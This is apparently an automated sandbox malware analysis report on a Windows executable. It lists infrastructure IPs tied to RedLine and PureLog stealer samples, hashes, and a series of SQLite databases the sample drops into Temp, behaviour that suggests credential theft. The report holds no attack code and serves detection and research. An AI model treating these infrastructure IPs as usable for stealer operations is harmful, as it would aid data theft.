EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 214 Number of non-executed functions: 16
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:56:52	API Interceptor	42x Sleep call for process: UzQWEAhf9B.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROOTLAYERNETNL	RgIbrhxoEx.exe	Get hash	malicious	RedLine	Browse	185.222.57.151
	LisectAVT_2403002A_369.exe	Get hash	malicious	PureLog Stealer	Browse	45.137.22.173
	LisectAVT_2403002A_70.exe	Get hash	malicious	PureLog Stealer	Browse	45.137.22.173
	fOgI44YEok.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	45.137.22.242
	WKRej3JIRi.exe	Get hash	malicious	RedLine	Browse	185.222.57.147
	svEEudloxo.exe	Get hash	malicious	RedLine	Browse	185.222.57.153
	owKQ0b029a.exe	Get hash	malicious	RedLine	Browse	185.222.57.67
	8LcFUXH9xN.exe	Get hash	malicious	RedLine	Browse	185.222.57.74
	0h6tTGKedZ.exe	Get hash	malicious	RedLine	Browse	185.222.57.153
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf	Get hash	malicious	FormBook	Browse	45.137.22.78

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\tmp1EA9.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1ECA.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1EDA.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1EFA.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1EFB.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp57CF.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp57D0.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp57E1.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp57E2.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp57F3.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp57F4.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5804.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5815.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5825.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5826.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5837.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5848.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7078.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7089.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp909F.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp90AF.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp90C0.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp90D0.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp90E1.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
